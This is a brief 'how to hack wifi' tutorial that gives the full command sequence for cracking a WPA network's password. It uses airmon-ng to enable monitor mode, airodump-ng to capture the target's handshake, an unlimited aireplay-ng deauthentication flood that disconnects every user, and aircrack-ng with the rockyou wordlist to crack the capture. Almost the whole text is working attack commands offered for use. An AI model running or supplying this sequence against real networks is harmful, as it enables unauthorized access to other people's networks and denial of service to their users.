How to hack wifi 3 way to crack handshake file
how to hack wifi hacking wifi hacking
checking our wifi interface name with Linux command ifconfig(Ifconfig is used to configure the kernel-resident network interfaces) and tail command to see last 5 lines
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ifconfig |tail |
After seeing our wifi interface card name now starting our wifi monitor mode ( airmon-ng ) and you see my wifi interface changes wlan0 to wlan0mon monitor mode is enabled
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airmon-ng start wlan0 |
our next command is ( airodump-ng is used for packet capturing) start our wifi capturing airodum-ng and our wifi monitor mode name
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airodump-ng wlan0mon |
wifi monitor mode is started and you see lots of wifi connection today we attacking
our wifi ( james_hacker ) copy our target bssid and go to the next step
Starting packet capturing target wifi (–bssid mean our target wif mac address) (-c mean channel number) -w to path save our capture handshake file (wlan0mon monitor mode interface name)
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airodump-ng --bssid 78:54:2E:75:7F:B2 -c 1 -w /root/Desktop/wifi/jameshacker wlan0mon |
(aireplay-ng is used to inject/replay frames sending) target wifi deauth packet (-a target mac address) –death 0 unlimited packets send) as many users are connected wifi all disconnected
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aireplay-ng -a 78:54:2E:75:7F:B2 --deauth 0 wlan0mon |
and we see after sending many deauth Paket all user disconnect
Cracking wifi password our handshake file (-w our wordlist path)
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aircrack-ng /root/Desktop/wifi/jameshacker-01.cap -w /usr/share/wordlists/rockyou.txt |
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